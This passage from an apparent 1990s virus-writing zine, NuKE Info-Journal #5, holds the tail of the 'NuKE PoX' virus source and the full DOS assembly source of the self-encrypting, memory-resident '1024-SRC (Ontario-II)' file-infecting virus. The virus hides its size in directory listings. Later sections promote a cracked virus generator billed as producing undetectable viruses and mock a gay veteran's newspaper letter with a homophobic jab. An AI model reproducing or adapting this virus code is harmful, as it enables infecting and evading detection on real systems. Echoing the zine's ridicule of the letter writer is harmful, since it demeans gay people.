inc si
loop av
av1: cmp word ptr ds:[si-2],'NA'
jnz av2
cmp word ptr ds:[si-4],'CS'
jz fuck_av
av2: cmp word ptr ds:[si-2],'NA'
jnz av3
cmp word ptr ds:[si-4],'EL'
jz fuck_av
av3: cmp word ptr ds:[si-2],'TO'
jnz not_av
cmp word ptr ds:[si-4],'RP'
jz fuck_av
not_av: pop cx
pop si
clc
ret
fuck_av: pop cx
pop si
stc
ret
Check_4_av ENDP
msg db "NuKE PoX V2.0 - Rock Steady"
old_time dw 0
old_date dw 0
file_handle dw 0
jump_address db 0E9h,90h,90h
buffer db 90h,0CDh,020h ;\
db 18h DUP (00) ;-Make 1Bh Bytes
last:
seg_a ends
end start
;==========================================================================
;=========================================================================
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; 1024-SRC Virus (Ontario-II) by Death Angel
; ========
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;
;This VIRUS was only written as an experiment to see how far a computer
;virus could go through development. This pariticular virus in its present
;form WILL NOT do any damage to your data or go off bouncing a ball across
;your screen or play Yankee Doddle, IT WILL ONLY infect programs.
;
; Virus Information:
; Hides: In upper RAM, requires 3K of memory.
; Size: 1K (exactly when attached to either EXE or COM files)
; ID: Seconds in date of file is set to 32 (impossible value)
; .COM files, the 4th byte is 'O'
; .EXE files, the stack pointer is 0600h
;
; Cover-Up: If loaded with DEBUG, it will remove itself from memory.
; When doing a DIR, it will cover up the filesize increase.
;
;Notes: Also infects on a file open if the file ends in COM,EXE or OVL
;
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Stack_Size Equ 512+1
Code Segment Para Public 'CODE'
Assume Cs:Code, Ds:Code
Org 0000h
Jmpfar Macro addr
db 0EAh
dd addr
Endm
Callfar Macro addr
db 09Ah
dd addr
Endm
Retfar Macro num
db 0CAh
dw num
Endm
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
; Do a loop to decode the rest of the virus.
Virus_Begin:
V00: Mov Bx, offset V05-V05_Back
V04: Mov Cx, offset Start_Code-(offset V05-V05_Back)
V01: Mov Al, 00h
V02: Add Byte ptr Cs:[Bx], Al
V03: Xor Al, 00h
Inc Bx
Loop V02
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
V05_Back Equ 0
V05: Sub Bx, offset Start_Code
Xchg Ax, Cx
Dec Ax
Int 21h
Or Al, Ah
Je Run_Prog
Push Ds
Xor Di, Di
Mov Ds, Di
Lds Ax, Dword ptr Ds:[21h*4]
Mov Word ptr Cs:[Bx].Saved_21, Ax
Mov Word ptr Cs:[Bx].Saved_21+2, Ds
Mov Cx, Es
Dec Cx
Mov Ds, Cx
Sub Word ptr Ds:[Di+03h], 3072/16
Mov Ax, Word ptr Ds:[Di+12h]
Sub Ax, 3072/16
Mov Word ptr Ds:[Di+12h], Ax
Mov Es, Ax
Sub Ax, 1000h
Mov Word ptr Cs:[Bx+Dos_Seg-2], Ax
Push Cs
Pop Ds
Mov Si, Bx
Mov Cx, offset Start_Code
Cld
Rep Movsb
Mov Ds, Cx
Cli
Mov Word ptr Ds:[21h*4], offset New_21
Mov Word ptr Ds:[21H*4]+2, Es
Sti
Mov Ax, 4BFFh
Push Bx
Int 21h
Pop Bx
Pop Ds
Push Ds
Pop Es
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Run_Prog:
Lea Si, [Bx].Start_Code
Mov Di, 0100h
Cmp Bx, Di
Jb Run_Exe
Run_COM:
Push Di
Movsw
Movsw
Ret
Run_EXE:
Mov Ax, Es
Add Ax, 0010h
Add Word ptr Cs:[Si+02], Ax
Add Word ptr Cs:[Si+04], Ax
Cli
Mov Sp, Word ptr Cs:[Si+06]
Mov Ss, Word ptr Cs:[Si+04]
Sti
Jmp Dword ptr Cs:[Si+00]
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Check_Present:
Inc Ax
Iret
New_21: Cmp Ax, 0FFFFh ; Checking if resident ?
Je Check_Present
Cmp Ah, 4Bh ; Executing a program ?
Je Load_Program
Cmp Ah, 11h ; Doing a DIR ?
Je Find_First
Cmp Ah, 12h ; Doing a DIR ?
Je Find_Next
Cmp Ax, 3D00h ; Opening a file ?
Jne Run_21
Call Open_File
Run_21:
Jmpfar 0 ; Goto vector 21h
Saved_21 Equ $-4
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Find_First:
Find_Next:
Push Bp
Mov Bp, Sp
Cmp Word ptr [Bp+04], 1234h
Dos_Seg:
Pop Bp
Jb Run_21
Call Do_21
Call Save_Regs
Mov Ah, 2Fh
Call Do_21
Cmp Byte ptr Es:[Bx], 0FFh
Je F20
Sub Bx, +7
F20: Mov Al, Byte ptr Es:[Bx].1Eh
And Al, 1Fh
Cmp Al, 1Fh
Jne F00
Mov Dx, Word ptr Es:[Bx].26h
Mov Ax, Word ptr Es:[Bx].24h
Sub Ax, offset Virus_End
Sbb Dx, +00
Or Dx, Dx
Jb F00
Mov Word ptr Es:[Bx].26h, Dx
Mov Word ptr Es:[Bx].24h, Ax
F00: Call Restore_Regs
IRet
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Load_Program:
Cmp Al, 01h
Je Disinfect_DEBUG
Cmp Al, 0FFh
Je Infect_COMSPEC
Call Infect_File
Jmp Run_21
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Infect_COMMAND:
Push Dx
Push Ds
Mov Dx, offset Command_File
Push Cs
Pop Ds
Mov Byte ptr Ds:Command_Flag, 0FFh
Call Infect_File
Pop Ds
Pop Dx
Iret
Infect_COMSPEC:
Mov Ah, 51h
Call Do_21
Mov Es, Bx
Mov Ds, Es:[002Ch]
Xor Si, Si
Push Cs
Pop Es
LP00: Mov Di, offset COMSPEC_name
Mov Cx, 0004h
Rep Cmpsw
Jcxz LP20
LP10: Lodsb
Or Al, Al
Jne LP10
; Cmp Al, Byte ptr [Si]
Cmp Byte ptr [Si], 00
Jne LP00
Jmp Infect_COMMAND
LP20: Mov Dx, Si
Mov Byte ptr Cs:Command_Flag, 0FFh
Call Infect_File
IRet
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Disinfect_DEBUG:
Push Es
Push Bx
Call Do_21
Pop Bx
Pop Es
Call Save_Regs
Jb LP30
Xor Cx, Cx
Lds Si, Dword ptr Es:[Bx].12h
Push Ds
Push Si
Mov Di, 0100h
Cmp Si, Di
Jl DI00
Ja LP31
Lodsb
Cmp Al, 0E9h
Jne LP31
Lodsw
Push Ax
Lodsb
Cmp Al, 'O'
Pop Si
Jne LP31
Add Si, 103h
Inc Cx
Inc Cx
Pop Ax
Push Si
Push Ds
Pop Es
Jmp short DI10
DI00: Lea Di, Dword ptr [Bx].0Eh
Cmp Word ptr Es:[Di].00h, offset Virus_End+Stack_Size-2
Jne LP31 ; Note 4B01/decrements stack by 2
DI10: Lodsb
Cmp Al, 0BBh
Jne LP31
Lodsw
Push Ax
Lodsw
Cmp Ax, Word ptr Cs:[V04]
Pop Si
Jne LP31
Add Si, offset Start_Code-(offset V05-V05_Back)
Jcxz DI15
Rep Movsw
Jmp short DI25
DI15: Mov Ah, 51h
Call Do_21
Add Bx, 0010h
Mov Ax, [Si+06h]
Dec Ax
Dec Ax
Stosw
Mov Ax, [Si+04h]
Add Ax, Bx
Stosw
Movsw
Lodsw
Add Ax, Bx
Stosw
DI25: Pop Di
Pop Es
Xchg Cx, Ax
Mov Cx, offset Virus_End
Rep Stosb
Jmp short LP32
LP31: Pop Ax
Pop Ax
LP32: Xor Ax, Ax
Clc
LP30: Call Restore_Regs
Retfar 0002h
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Open_File Proc Near
Call Save_Regs
Mov Si, Dx
OF00: Lodsb
Or Al, Al
Je OF50
Cmp Al, '.'
Jne OF00
Mov Di, offset File_Exts-3
Push Cs
Pop Es
Mov Cx, 0003h
OF10: Push Cx
Push Si
Mov Cl, 03h
Add Di, Cx
Push Di
OF12: Lodsb
And Al, 5Fh
Cmp Al, Byte ptr Es:[Di]
Jne OF15
Inc Di
Loop OF12
Call Infect_File
Add Sp, +6
Jmp short OF50
OF15: Pop Di
Pop Si
Pop Cx
Loop OF10
OF50: Call Restore_Regs
Ret
Open_File Endp
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Infect_File Proc Near
Call Save_Regs
Mov Ax, 4300h
Call Do_21
Jb IF00
Push Cx
And Cl, 01h
Cmp Cl, 01h
Pop Cx
Jne H00
And Cl, 0FEh
Mov Ax, 4301h
Call Do_21
H00: Mov Ax, 3D02h
Call Do_21
Jnb IF02
IF00: Jmp IFE4
IF02: Xchg Bx, Ax
Push Cs
Push Cs
Pop Ds
Pop Es
Mov Ax, 5700h
Call Do_21
Push Dx
Push Cx
And Cl, 1Fh
Cmp Cl, 1Fh
Je IF05
Mov Dx, offset Exe_Header
Mov Cx, offset Exe_Header_End-offset Exe_Header
Mov Ah, 3Fh
Call Do_21
Jnb IF10
IF05: Stc
Jmp IFE2
IF10: Cmp Ax, Cx
Jne IF05
Xor Dx, Dx
Mov Cx, Dx
Mov Ax, 4202h
Call Do_21
Or Dx, Dx
Jne IF12
Cmp Ax, offset Virus_End+Stack_Size
Jb IF05
IF12: Cmp Word ptr Ds:Sign, 'ZM'
Je EXE_type
COM_type:
Cmp Byte ptr Ds:Sign+3, 'O'
Je IF05
Cmp Byte ptr Ds:Command_Flag, 00h
Je CT00
Sub Ax, offset Virus_End
Xchg Dx, Ax
Xor Cx, Cx
Mov Ax, 4200h
Call Do_21
CT00: Mov Si, offset Sign
Mov Di, offset Start_Code
Movsw
Movsw
Sub Ax, 0003h
Mov Byte ptr Ds:Sign, 0E9h
Mov Word ptr Ds:Sign+1, Ax
Mov Byte ptr Ds:Sign+3, 'O'
Add Ax, (offset V05-V05_Back)+0103H
Jmp short IF30
EXE_type:
Cmp Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size
Je IF05
Cmp Word ptr Ds:Overlay_Num, 0000h
Jne IF05
Push Dx
Push Ax
Mov Cl, 04h
Ror Dx, Cl
Shr Ax, Cl
Add Ax, Dx
Sub Ax, Word ptr Ds:Size_Header
Mov Si, offset Start_Ip
Mov Di, offset Start_Code
Movsw
Movsw
Mov Si, offset Stack_Ss
Movsw
Movsw
Mov Word ptr Ds:Start_Cs, Ax
Mov Word ptr Ds:Stack_Ss, Ax
Mov Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size
Pop Ax
Pop Dx
Push Ax
Add Ax, offset Virus_End+Stack_Size
Jnb IF29
Inc Dx
IF29: Mov Cx, 512
Div Cx
Mov Word ptr Ds:File_Size, Ax
Mov Word ptr Ds:Remainder, Dx
Pop Ax
And Ax, 000Fh
Mov Word ptr Ds:Start_Ip, Ax
Add Ax, (offset V05-V05_Back)
IF30: Mov Word ptr Ds:V00+1, Ax
Push Ds
Xor Si, Si
Mov Ds, Si
Mov Ax, Word ptr Ds:[046Ch]
Pop Ds
Push Bx
Mov Byte ptr Ds:V01+1, Ah
And Ax, 000Fh
Xchg Bx, Ax
Shl Bx, 01h
Mov Ax, Word ptr [Bx].Random_AL
Mov Word ptr Ds:V03, Ax
Mov Di, offset Real_End
Mov Cx, offset Virus_End
Push Cx
Cld
Rep Movsb
Mov Bx, (offset V05-V05_Back)
Push Word ptr [Bx]
Mov Byte ptr [Bx+V05_Back], 0C3h
Push Bx
Xor Byte ptr Ds:([Bx+V02+1])-(offset V05-V05_Back), 28h
Add Bx, offset Real_End ; Toggle ADD [BX],AL/SUB [BX],AL
Call V04
Pop Bx
Pop Word ptr [Bx]
Mov Dx, offset Real_End
Pop Cx
Pop Bx
Mov Ah, 40h
Call Do_21
IFE1: Jb IFE2
Xor Dx, Dx
Mov Cx, Dx
Mov Ax, 4200h
Call Do_21
Jb IFE2
Mov Dx, offset Exe_Header
Mov Cx, offset Exe_Header_End-offset Exe_Header
Mov Ah, 40h
Call Do_21
IFE2: Pop Cx
Pop Dx
Jb IFE3
Cmp Byte ptr Ds:Command_Flag, 0FFh
Je IFE3
Or Cl, 1Fh
IFE3: Mov Ax, 5701h
Call Do_21
Mov Ah, 3Eh
Call Do_21
IFE4: Mov Byte ptr Cs:Command_Flag, 00h
Call Restore_Regs
Ret
Infect_File Endp
Do_21 Proc Near
Pushf
Call Dword ptr Cs:Saved_21
Ret
Do_21 Endp
Save_Regs:
Push Bp
Mov Bp, Sp
Push Bx
Push Cx
Push Dx
Push Si
Push Di
Push Ds
Push Es
Pushf
Xchg [Bp+02], Ax
Push Ax
Mov Ax, [Bp+02]
Ret
Restore_Regs:
Pop Ax
Xchg [Bp+02], Ax
Popf
Pop Es
Pop Ds
Pop Di
Pop Si
Pop Dx
Pop Cx
Pop Bx
Pop Bp
Ret
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
Random_AL:
Inc Al ; 0
Dec Al ; 1
Inc Ax ; 2
Inc Ax
Dec Ax ; 3
Dec Ax
Add Al, Cl ; 4
Sub Al, Cl ; 5
Xor Al, Cl ; 6
Xor Al, Ch ; 7
Not Al ; 8
Neg Al ; 9
Ror Al, 01h ; A
Rol Al, 01h ; B
Ror Al, Cl ; C
Rol Al, Cl ; D
Nop ; E
Nop
Add Al, Ch ; F
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
COMSPEC_name db 'COMSPEC='
COMMAND_file db '\COMMAND.COM',0
FILE_Exts db 'COMEXEOVL'
NUM_Exts equ 3
Start_Code dw 00000h
dw 0FFF0h
Start_Stack dw ?
dw 0FFFFh
Org 400h
Virus_End:
Saved_24 dw ?,?
Command_Flag db 0
Temp dw ?
Exe_Header:
Sign dw ?
Remainder dw ?
File_Size dw ?
Num_Real dw ?
Size_Header dw ?
Min_Above dw ?
Max_Above dw ?
Stack_Ss dw ?
Stack_Sp dw ?
CheckSum dw ?
Start_Ip dw ?
Start_Cs dw ?
Display_Real dw ?
Overlay_Num dw ?
Exe_Header_End:
Real_End:
Code Ends
End Virus_Begin
;==========================================================================
===========================================================================
Evolution of The Cyberculture
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Something's happening here. What it is ain't exactly clear. There's a
punk with a computer over there, tellin' me I got to beware...
These days, a new breed of young politicized radicals, known as
cyberpunks, roam a techno-underground. These cyberpunks are computer
cowboys riding the trails of cyberspace. Circumventing software barriers
in search of information and services or sometimes just to wreak a little
mischievous havoc. They've got the equipment and, they say, the technical
know how to slip into virtually any computer system and affect changes
with global ramifications. They could effectively cripple the economy or
shut down communications systems round the world. Cyberpunks hold the
potential for becoming the most powerful countercultural force ever.
The government has launched at least two major operations, one in 1990
called Operation Sundevil, to quash the movement. As Secret Service Special
Agent John F. Lewis put it, "There are some very talented individuals who
are unfortunately misdirecting their energies. But to say they're leaps and
bounds ahead of law enforcement personnel isn't true."
Our CyberCulture has been built by the best, it perhaps was started by this
tall and slender person, wearing black jeans and sporting a pair of John
Lennon Specs, we know him as Michael Synergy. Synergy was your basic
computer punk, he spent his time exploring cyberspace, staging his own
quiet protests by going where he wanted, when he wanted. Synergy became so
adept at infiltrating systems that he's become a legend, today he remains
something of an icon in the techno-underground.
Synergy explains that most of his adventures was to become educated. At
that time there wasn't a C-Compiler on microcomputers, so he'd break into
Bell Labs just to learn C. Most hackers, Synergy says, use their talents
simply to learn. In the very beginning Synergy managed to slip into a
supposedly secure top-secret computer network run by the intelligence
community and the Department of Defense (DOD), when the DOD took him out
of cyber-circulation and brought him in to conduct "penetration testing
and security design" for national Security Agency, Secret Service, and
FBI, as well as the DOD.
Synergy has created a huge spark, that has developed to our current
Cyberpunk movement. Science Fiction took off, and we had the beginning of
with William Gibson's _Necromancer_ in 1984. The well-known movie
_War Games_ was amongst the first to draw ME (Rock Steady) into the
Cyberpunk world. Other Cyberpunk-oriented works by writers such as Bruce
Sterling (_Schismatrix_, _Islands in the Net_) Pat Cadigan (_Mindplayers_,
_Pretty Boy Crossover_) and John Shirly (_Eclipse Crona_) captured SF fans.
Gibson also came back with two more novels, _Count Zero_ and _Mona Lisa
Overdrive_, as well as an anthology of short stories, _Burning Chrome_.
Of course we can say this all began in Ridley Scott's 1980 movie
_Bladerunner_ loosely-based on Philip K. Dick's novel "Do Androids Dream of
Electric Sheep?" The flood has even fallen into the now so-called cyberpunk
bands which have European roots, including Front-242 (Belgium), Laibach
(Yugoslavia) and Can (Germany).
The flood of culture certainly attracted several punks, many whom now can
draw their links to such SF culture. However just like "hacker" the term
"cyberpunk" has also come to mean "computer criminal" and cases like the
1988 Internet "worm" have undoubtedly fed the crackdown fever. Created by
25-year-old Robert Morris, the worm shut down some 6,500 computers and
caused an estimated $150,000 to $200 million worth of damages to computer
systems nationwide.
Since then, there have been several instances of what the hackers claim
are government attempts to suppress the cyberpunk media. Steve Jackson
Games is a case in point. Secret Service agents raided this small Austin-
based game manufacturer, publishers of fantasy-role-playing games, in March
of 1990.
With the recent arrests of numerous hackers for illegal entry and data
possession, the battles over control of the electronic frontier and
hackers' rights are now being waged in courts. One critical issue is
whether information belongs to a given corporation or government or
whether it belongs to the world.
Certainly what started off as science fiction isn't science fiction any
more. The several arrests are meant to make an example, and to perhaps
scare ourselves back "into place." Of course this is where the NuKE turning
point arrives; rather than hacking ourselves and risking ourselves
against the lawman, there is the idea of making a program to perhaps work
like ourselves, its mission to bypass software restrictions and perhaps to
send a message to all, or to make the world fall upon their knees and go
crying to Paul Ferguson for help. I can assure you that the cyberpunk
future is still up for grabs, between utopia and dystopia, and whatever it
will be it will be a long, hard battle to the end.
Rock Steady and The NuKE Associates
===========================================================================
===========================================================================
The Truth About Gary...
~~~~~~~~~~~~~~~~~~~~~~~
The following is an actual letter to the editor from the January 18th
issue of the _Chicago Tribune_ (sec. 1, p. 12). I am not making this up.
For your convenience, I've typed it up just as it appears in the paper:
On tolerance
OAK PARK --- This is in
response to "A battle for the
military's soul," by Robert
Maginnis.
How nice of you, sir, as a
lieutenant colonel, to be able to
express the views of an
organization of close to 1
million employees! I also respect
that you, as a stated
heterosexual, also know the
tendencies of the appoximately
2.56 million homosexuals in the
United States. And I, having
proudly served seven years in
the military, was doing it wrong!
I should have, as a
homosexual being, been more
promiscuous, tried suicide,
become an alcoholic, contracted
a sexual disease, had close to
500 partners (wow!), and abused
children to boot.
As to the transfusions of
blood, I guess the rest of the
world is less risky, with 90 per-
cent of HIV infections world-
wide being within the heterosexual
sphere. Furthermore, the ter-
minology you attempt to use,
pro-gay sensitivity or re-educa-
tion classes, is laughable.
All we 're asking is to be
treated with respect as human
beings. The rest of the world
lives with these gay people; why
in the hell shouldn't you? Rec-
ognize the right to be human in
all our ways.
Gary Watson
^^^^^^^^^^^
Aha! So the truth finally comes out Gary! We all knew it all along!
I'm just glad that you came out of the closet by submitting your letter
to a major newspaper...
Nowhere Man/NuKE
===========================================================================
===========================================================================
Files Included With NuKE Info-Journal #5
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
DETECTOR.ZIP
~~~~~~~~~~~~
Included with this kit are a few .ZIPs that our two good friends
wrote. The first is called DETECTOR.ZIP. It consists of a
"strain extractor" by Savage Beast/NuKE. This software will be able
to help you to catch your funny viruses when no scanner finds them.
Inside the .ZIP there are two files, TEST1.COM and TEST2.COM. They
should be infected, then reset your computer and execute the
DECTECTOR program. Have fun and use the program in good health!
Provided by: Savage Beast
GENVIRUS.ZIP
~~~~~~~~~~~~
GenVirus is a virus generator developed in France. This program was
ORIGINALLY in French, and "crippled," meaning you had to send the
dickweed programmer mondo money for a legit copy. So we gave it
to Rock Steady, who cracked the shit out of the file! Being in Canada
and stranded in Quebec (French-Pepper land), Rock Steady was able to
translate the WHOLE GenVirus program into English! It was tough, being
written in C++, but once you live and breath ASM its just a matter of
time. Anyhow thanks to Savage Beast for getting us a copy of this program!
REMEMBER: ALL the viruses created with GenVirus are UNDETECTABLE!
The program ONLY compiles binary code, and attaches the virus to a
"dummy" .COM file, but nevertheless it was developed AFTER VCL v1.0,
(VCL changed the WHOLE WORLD!), and still goes undetectable, as people
never were able to crack the program...<hehe>
Provided by: Savage Beast
Cracked by: Rock Steady
MCAFEE.STR
~~~~~~~~~~
Is a Product of Screaming Radish from Australia that extracts all virus
signatures from any version of McAfee Scan. We are unable to release the
product in this info journal as McAfee may restructure their virus format
of saving virus signatures, as they can do so, by simple changing one or
two small adjustments, therefore this program is not available to the
general public. But if you want to get a copy call any of the NuKE Support
systems.
Provided: Screaming Radish
The NuKE Associates
===========================================================================
===========================================================================
NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE
uK E-
KE CREDITS -N
E- Nu
-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuK
NuKE would like to send its extended thanks to all supporters and members
that have put themselves on the line to be with us. Mainly:
Death Angel (416) [Thanks for your support! (And source!)]
Rock Steady (514) [You have the right to remain silent. You..]
Pure Energy (514) [I have a Board? Naaa...]
Silent Shadow (514) [What?, Who?, How?, When?, Where?, Why?]
Nowhere Man (708) [See, no capital "W" Nowhere!]
ARiSToTLE (804) [TRISKAIDEKAPHOBIA - one of a kind dude.]
FireCracker (804) [Huh, VGA? Whats VGA? Gimme my money back!]
Dark Angel (819) [Can't have a group without you, huh?]
Savage Beast (+41) [Hey where's my limo???]
Ford Fairlane (+46) [That's for staying on our side!]
Tormentor/DY (+46) ["Fame" is truely an evil]
Phrozen Doberman (+61) [Gooooood Daaaaay...]
Screaming Radish (+61) [Beastiality you say?...humm]
TLN (+61) [Where's my XXX calendar of the AVers?]
Shidaq Arl'hur (+61) [Welcome aboard mate!]
The Wierd One (+61) [FCB, how's it taste?]
The Dark Elf (+61) [Scan strings, who needs scan strings?]
(Ordered by area/country code. We don't like to play favourates!)
Anyhow if I missed anyone SIMPLY send me e-mail, no credit ruining, no
letter bombs, PLEASE! But I believe I put in everyone that have contributed
alot to the NuKE Team, and we thank you in return.
NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites
---------------------------------------------------------------------------
ÃÄÄÄ[BBS Name]ÄÄÄÄÄÄÄ[Phone Number][Modem]ÄÄ[SysOp]ÄÄÄÄÄÄÄÄÄÄÄÄ[NuKE-Net]Ä´
Cybernetic Voilence. 514-425-4540 V32Bis Pure Energy American HUB
Total Mayhem........+613-ASK-NUKE HST/DS Phrozen Doberman Australian HUB
Enigma E:N:U:N.....+41-22-3400329 V32Bis Savage Beast European HUB
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
I listed only the HUB systems, as that is always where you can reach any
of us for sure. We do have many other systems, but since this file will
not be encrypted I didn't wish to post them for reasons of security. If you
wish to join NuKENET simply call up the hub(s) closest to your area, and
you will be joined upon to it.
Currently NuKENET sites are located in Montreal, Ottawa/Hull, Toronto,
Detroit, Chicago, Philadelphia, Richmond, Stockholm, Gteborg, Geneva,
Amsterdam, Sofia, Melbourne, and Brisbane.
Remember, main rules for NuKENET are that you must call the system up every
2-3 days, anything less will purge you from our net; no illegalities, no
codes and material like that (they will be turned over to the appropriate
law enforcement!). And we insist on an active system -- one post per month
ain't our idea of active.
Rock Steady/NuKE
===========================================================================
